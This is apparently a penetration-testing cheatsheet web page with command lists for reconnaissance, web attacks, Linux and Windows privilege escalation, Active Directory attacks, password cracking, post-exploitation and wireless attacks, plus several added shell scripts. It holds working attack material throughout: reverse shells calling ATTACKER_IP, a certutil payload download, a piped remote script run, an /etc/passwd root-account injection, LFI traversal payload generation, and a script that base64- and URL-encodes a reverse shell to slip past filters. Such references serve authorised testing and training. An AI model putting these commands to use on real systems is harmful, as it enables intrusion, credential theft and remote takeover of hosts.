# Reconnaissance
Information gathering is the foundation of every pentest. Start with passive recon, then move to active scanning.
Nmap — Network Discovery
nmap -sC -sV -oA scan_results TARGET_IP
nmap -p- -T4 --min-rate=1000 TARGET_IP # full TCP range; follow up with -sC -sV on the ports it finds open
nmap -sU --top-ports 200 TARGET_IP # UDP is slow, so limit it to the common ports
nmap --script vuln TARGET_IP # NSE "vuln" category; noisy, and some scripts are intrusive
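The `-oA scan_results` form above also writes `scan_results.gnmap`, which is the easiest file to post-process. This added example (not from the original page) pulls the open ports per host out of that file so the follow-up `-sC -sV` scan only touches ports that answered. The `.gnmap` excerpt embedded in `sample_gnmap` is constructed for the demonstration, not real scan output.

```shell
# Constructed .gnmap excerpt (same layout nmap -oA writes; tab-separated fields)
sample_gnmap() {
    printf '# Nmap 7.94 scan initiated as: nmap -p- -oA scan_results 10.10.10.0/29\n'
    printf 'Host: 10.10.10.5 ()\tStatus: Up\n'
    printf 'Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//Apache httpd 2.4.52/, 443/closed/tcp//https///\tIgnored State: filtered (65532)\n'
    printf 'Host: 10.10.10.7 ()\tPorts: 445/open/tcp//microsoft-ds//, 3389/open/tcp//ms-wbt-server//\n'
    printf '# Nmap done at -- 2 IP addresses (2 hosts up) scanned\n'
}

# gnmap_open_ports: stdin = .gnmap text, stdout = "<host> <port,port,...>"
# for every host with at least one open port (closed/filtered are dropped)
gnmap_open_ports() {
    awk '
        /^Host: / && /Ports: / {
            host = $2
            sub(/.*Ports: /, "")                  # keep only the port list
            sub(/[ \t]+Ignored State.*/, "")      # drop the trailing summary
            n = split($0, entry, /, /)
            list = ""
            for (i = 1; i <= n; i++) {
                # each entry is port/state/proto/owner/service/rpc/version/
                split(entry[i], f, "/")
                if (f[2] == "open")
                    list = list (list == "" ? "" : ",") f[1]
            }
            if (list != "") print host, list
        }'
}

# gnmap_ports_for <host>: the comma list for one host, ready for nmap -p
gnmap_ports_for() {
    gnmap_open_ports | awk -v h="$1" '$1 == h { print $2 }'
}

# Real use, after the page's nmap -p- ... -oA scan_results TARGET_IP:
#   nmap -sC -sV -p "$(gnmap_ports_for TARGET_IP < scan_results.gnmap)" TARGET_IP
sample_gnmap | gnmap_open_ports
```

The parser only trusts the `state` field, so ports nmap reports as `closed` or `filtered` never make it into the follow-up scan.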
Subdomain & DNS Enumeration
subfinder -d TARGET_DOMAIN -o subdomains.txt
amass enum -d TARGET_DOMAIN -o amass_results.txt
dig axfr @DNS_SERVER TARGET_DOMAIN # zone transfer; run it against each authoritative name server, it only succeeds where AXFR is left open
Directory & File Brute-force
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# Web Application Hacking
Test for OWASP Top 10 vulnerabilities: SQLi, XSS, SSRF, IDOR, authentication bypass, and more.
SQL Injection
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
sqlmap -r request.txt --level 5 --risk 3 --batch # request.txt is a saved Burp request; risk 3 adds OR-based payloads that can modify data
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
SSRF & LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:" # -mr keeps only responses that echo /etc/passwd content (file:// or internal read reached)
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404 # -fc hides the 404s; also filter by size (-fs) once you know the "not found" page length
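The LFI wordlist above covers file names, not the filter bypasses. This added example (not from the original page) generates encoded traversal variants for one target file so the same `ffuf` command can test whether the application strips `../`, decodes once or twice, or ignores the null byte. Which variant works depends on the application; the set below is the standard list, not a claim about any particular target.

```shell
# traversal_variants <file> [depth]: one traversal payload per line
traversal_variants() {
    tv_file=$1
    tv_depth=${2:-6}
    tv_plain=""; tv_url=""; tv_dot=""; tv_dbl=""; tv_nest=""
    tv_i=0
    while [ "$tv_i" -lt "$tv_depth" ]; do
        tv_plain="${tv_plain}../"        # plain ../
        tv_url="${tv_url}..%2f"          # slash URL-encoded
        tv_dot="${tv_dot}%2e%2e/"        # dots URL-encoded
        tv_dbl="${tv_dbl}..%252f"        # slash double-encoded (decoded twice server-side)
        tv_nest="${tv_nest}....//"       # survives a single non-recursive strip of "../"
        tv_i=$((tv_i + 1))
    done
    printf '%s\n' "$tv_plain$tv_file" "$tv_url$tv_file" "$tv_dot$tv_file" \
                  "$tv_dbl$tv_file" "$tv_nest$tv_file"
    printf '%s\n' "$tv_plain$tv_file%00"  # null-byte truncation: legacy PHP (< 5.3.4) only
}

# Real use with the page's ffuf command:
#   traversal_variants etc/passwd 8 > lfi_variants.txt
#   ffuf -u "https://TARGET/page?file=FUZZ" -w lfi_variants.txt -mr "root:"
traversal_variants etc/passwd 3
```

Six lines per depth is enough to tell the filter types apart; once you know which encoding lands, feed ffuf the file-name wordlist with that prefix instead of fuzzing both at once.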
Burp Suite Essentials
curl -x http://127.0.0.1:8080 -k https://TARGET # route the request through Burp's listener; -k accepts Burp's generated certificate
# Network Services
Common protocols and services you'll encounter during pentests: SMB, FTP, SSH, HTTP, SNMP.
SMB Enumeration
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
crackmapexec smb TARGET_IP -u '' -p '' --shares # null session; also try a guest account (-u guest -p '')
FTP
ftp TARGET_IP # Try anonymous:anonymous
SNMP
snmpwalk -v2c -c public TARGET_IP
# Linux Privilege Escalation
After getting a shell, escalate to root. Check SUID, capabilities, cron jobs, and kernel exploits.
Enumeration Scripts
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh # or host linpeas.sh on your own box and fetch it from there when the target has no internet access
SUID Binaries
find / -perm -4000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Cron Jobs
cat /etc/crontab; ls -la /etc/cron.*; crontab -l # look for jobs that run as root and call a script you can write to
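Listing the crontab is the easy half; the finding is a root job whose script you can edit. This added example (not from the original page) parses system-crontab lines, resolves each job to its command path and reports targets that are world-writable or do not exist yet. World-writable is tested with `find -perm` so the result does not depend on who runs the check; as the low-privilege user you would additionally test `[ -w ]`. The crontab text and the script files in `demo_cron_triage` are constructed for the demonstration.

```shell
# cron_targets: stdin = system crontab text, stdout = absolute command path per job
cron_targets() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }   # comments and blank lines
        /^[A-Za-z_]+=/ { next }             # SHELL=, PATH=, MAILTO=
        /^@/ { print $3; next }             # @reboot user command
        { print $7 }                        # m h dom mon dow user command
    ' | grep '^/' | sort -u
}

# cron_writable_targets: stdin = crontab text, stdout = "<tag> <path>", where
# tag is "writable" (world-writable file) or "missing" (path does not exist)
cron_writable_targets() {
    cron_targets | while IFS= read -r p; do
        if [ ! -e "$p" ]; then
            echo "missing $p"
        elif [ -n "$(find "$p" -prune -perm -002 2>/dev/null)" ]; then
            echo "writable $p"
        fi
    done
}

# Constructed crontab and script files in a temp dir; paths are printed as TMP/...
demo_cron_triage() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho backup\n' > "$d/backup.sh"; chmod 777 "$d/backup.sh"  # world-writable
    printf '#!/bin/sh\necho rotate\n' > "$d/rotate.sh"; chmod 755 "$d/rotate.sh"  # not writable
    printf 'SHELL=/bin/sh\nPATH=/usr/bin:/bin\n# m h dom mon dow user command\n*/5 * * * * root %s/backup.sh\n0 2 * * * root %s/rotate.sh --all\n@reboot root %s/cleanup.sh\n' "$d" "$d" "$d" \
        | cron_writable_targets | sed "s|$d|TMP|"
    rm -rf "$d"
}

# Real use: cron_writable_targets < /etc/crontab
demo_cron_triage
```

A "missing" target matters when its directory is writable: create the script, make it executable, and the job runs it as root on the next tick. Jobs that call a bare command name rely on the crontab's `PATH` line, which is the writable-PATH case the FAQ mentions.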
Sudo Misconfigurations
sudo -l
Writable /etc/passwd
openssl passwd -1 -salt hacker password123 # MD5-crypt hash; append a line of the form hacker:<hash>:0:0::/root:/bin/bash to /etc/passwd, then su hacker
# Windows Privilege Escalation
Escalate from a low-privilege user to SYSTEM. The usual routes are token impersonation, service abuse, and unquoted service paths.
Enumeration
winPEASany.exe quiet fast searchfast
whoami /priv # SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege means a potato-style escalation will work
Token Impersonation
.\GodPotato.exe -cmd "cmd /c whoami" # needs SeImpersonatePrivilege (typical for IIS and SQL service accounts)
Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows" # wmic is removed on recent Windows builds; query Win32_Service from PowerShell (Get-CimInstance) there
# Active Directory
AD pentesting: enumerate users, kerberoast, AS-REP roast, pass-the-hash, DCSync.
Enumeration
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt # users.txt = candidate names; hits are accounts with Kerberos pre-authentication disabled
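The two output files above can mix etypes: accounts configured for AES only come back as `$krb5tgs$17$`/`$krb5tgs$18$` while the rest are `$krb5tgs$23$`, and AS-REP hashes are `$krb5asrep$23$`. hashcat refuses a file that mixes modes, so this added example (not from the original page) maps each line to its hashcat mode and sorts a mixed file into one file per mode. The hash lines in `sample_krb_hashes` are constructed with truncated hex and are not real tickets.

```shell
# krb_hashcat_mode <hash-line>: print the hashcat -m value, fail if unrecognized
krb_hashcat_mode() {
    case "$1" in
        '$krb5tgs$23$'*)   echo 13100 ;;   # TGS-REP, RC4-HMAC (etype 23)
        '$krb5tgs$17$'*)   echo 19600 ;;   # TGS-REP, AES128-CTS-HMAC-SHA1-96
        '$krb5tgs$18$'*)   echo 19700 ;;   # TGS-REP, AES256-CTS-HMAC-SHA1-96
        '$krb5asrep$23$'*) echo 18200 ;;   # AS-REP, RC4-HMAC (etype 23)
        *) return 1 ;;
    esac
}

# krb_split_by_mode <outdir>: stdin = hash lines; writes <outdir>/krb_<mode>.txt
# and prints "<mode> <count>" for each file written
krb_split_by_mode() {
    outdir=$1
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        mode=$(krb_hashcat_mode "$line") || { echo "skip: unrecognized hash line" >&2; continue; }
        printf '%s\n' "$line" >> "$outdir/krb_$mode.txt"
    done
    for f in "$outdir"/krb_*.txt; do
        [ -e "$f" ] || continue
        m=${f##*/krb_}; m=${m%.txt}
        echo "$m $(wc -l < "$f" | tr -d ' ')"
    done
}

# Constructed sample: two RC4 TGS, one AES128 TGS, one AS-REP (hex truncated)
sample_krb_hashes() {
    printf '%s\n' \
      '$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$0123456789abcdef$deadbeefcafe' \
      '$krb5tgs$17$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*$fedcba9876543210$c0ffee' \
      '$krb5tgs$23$*svc_backup$CORP.LOCAL$backup/bk01.corp.local*$abcdef0123456789$feedface' \
      '$krb5asrep$23$jdoe@CORP.LOCAL:0011223344556677$8899aabbccddeeff'
}

# Real use:
#   cat kerberoast.txt asrep.txt | krb_split_by_mode ./hashes
#   hashcat -m 13100 ./hashes/krb_13100.txt /usr/share/wordlists/rockyou.txt
demo_dir=$(mktemp -d)
sample_krb_hashes | krb_split_by_mode "$demo_dir"
rm -rf "$demo_dir"
```

Crack the 13100 file first: RC4 tickets are orders of magnitude cheaper per guess than the AES ones, and a service account that still has RC4 enabled is usually the older, weaker password anyway.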
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH # LM half left empty; NTLM_HASH is the NT hash from secretsdump or a cracked SAM
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm # needs replication rights (Domain Admins, or the DS-Replication-Get-Changes ACEs)
# Password Attacks
Crack hashes, brute-force services, and spray credentials across the network.
Hash Cracking
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule # -m 1000 = NTLM
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Online Brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4 # keep -t low for SSH; most servers drop parallel connections
Password Spraying
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success # one password per round; read the lockout policy first and stay under the threshold
# Post-Exploitation
After getting access: establish persistence, pivot, exfiltrate data.
File Transfer
python3 -m http.server 8080
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
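The bash one-liner above breaks as soon as it passes through a quoting layer or a URL, and `/dev/tcp` is a common filter string. This added example (not from the original page) base64-wraps that exact payload so it survives injection points, with a URL-encoded form for GET parameters and a round-trip check that the wrapped payload decodes back to the original. The listener on the attacking host (`nc -lvnp 4444`) is assumed and not run here.

```shell
# revshell_raw <ip> <port>: the page's bash reverse shell
revshell_raw() {
    printf 'bash -i >& /dev/tcp/%s/%s 0>&1' "$1" "$2"
}

# revshell_b64 <ip> <port>: same payload, base64 on one line
revshell_b64() {
    revshell_raw "$1" "$2" | base64 | tr -d '\n'
}

# revshell_wrapped <ip> <port>: decodes and runs on the target; no quotes,
# redirects or slashes outside the base64 blob
revshell_wrapped() {
    printf 'echo %s | base64 -d | bash' "$(revshell_b64 "$1" "$2")"
}

# revshell_urlencoded <ip> <port>: wrapped form with the characters that break
# GET parameters percent-encoded (space, pipe, plus, equals)
revshell_urlencoded() {
    revshell_wrapped "$1" "$2" | sed 's/ /%20/g; s/|/%7C/g; s/+/%2B/g; s/=/%3D/g'
}

# revshell_roundtrip_ok <ip> <port>: true if decoding the blob gives back the raw shell
revshell_roundtrip_ok() {
    [ "$(revshell_b64 "$1" "$2" | base64 -d)" = "$(revshell_raw "$1" "$2")" ]
}

# Example for attacker 10.10.14.5 listening on 4444 (addresses are assumptions)
revshell_wrapped 10.10.14.5 4444; echo
revshell_urlencoded 10.10.14.5 4444; echo
```

Once the shell lands, upgrade it with the `pty.spawn` line below; the base64 wrapper only gets you the connection, not a usable terminal.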
Shell Upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
Pivoting
chisel server -p 8000 --reverse # On attacker
chisel client ATTACKER_IP:8000 R:socks # On target; opens a SOCKS proxy on the attacker at 127.0.0.1:1080 for proxychains
# Wireless Attacks
WiFi pentesting: capture handshakes, crack WPA2, rogue access points.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
aireplay-ng -0 5 -a BSSID wlan0mon # send 5 deauth frames so a client reconnects and the 4-way handshake is captured; disruptive, keep it in scope
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Cloud & Kubernetes
Enumerate cloud assets, exploit misconfigurations in AWS, Azure, GCP, and Kubernetes.
AWS
aws sts get-caller-identity
aws s3 ls s3://BUCKET_NAME --no-sign-request # unauthenticated; succeeds only if the bucket policy allows public listing
Kubernetes
kubectl get pods --all-namespaces
kubectl auth can-i --list
# Pentesting FAQ
This cheatsheet covers 200+ essential commands used in OSCP and real-world pentests: nmap scanning, privilege escalation (Linux and Windows), Active Directory attacks, web hacking, and post-exploitation techniques. Bookmark it and use our dedicated OSCP cheatsheet for exam-specific tips.
The essentials: nmap for network scanning, sqlmap for SQL injection, hashcat/john for password cracking, impacket tools for Active Directory, and linpeas/winpeas for privilege escalation enumeration.
Start with recon tools (nmap, subfinder), learn the OWASP Top 10 web vulnerabilities, then practice on HackTheBox or TryHackMe. Our beginner's guide walks you through the full methodology and recommended certifications.
Privilege escalation is gaining higher permissions than initially obtained. Linux: SUID binaries, sudo misconfigs, cron job abuse, writable PATH. Windows: SeImpersonatePrivilege (GodPotato), unquoted service paths, AlwaysInstallElevated. Always run LinPEAS/WinPEAS first.
Key tools: BloodHound (attack path mapping), impacket (GetUserSPNs, secretsdump, psexec), crackmapexec (credential spraying), evil-winrm (WinRM shells), and Rubeus (Kerberos attacks). Start by mapping the domain with BloodHound to find the shortest path to Domain Admin.
SQL injection is a web vulnerability where user input is executed as SQL code. Test manually with ' OR '1'='1 or use sqlmap -u 'http://target/?id=1' --batch --dbs for automation. It can lead to data exfiltration, auth bypass, or remote code execution.
The OWASP Top 10 (2021 edition) lists the most critical web application risks: Broken Access Control, Cryptographic Failures, Injection (SQLi, XSS, SSTI), Insecure Design, Security Misconfiguration, Vulnerable and Outdated Components, Identification and Authentication Failures, Software and Data Integrity Failures, Security Logging and Monitoring Failures, and Server-Side Request Forgery. It is the foundation of any web pentesting methodology.
# Related Resources
- Pentesting Glossary — 60+ cybersecurity terms defined for ethical hackers
- How to Start Pentesting — Step-by-step beginner's guide with methodology & tools
- Nmap Cheatsheet — The most complete nmap reference for recon and port scanning
- OSCP Cheatsheet — Commands, techniques and exam tips for OSCP preparation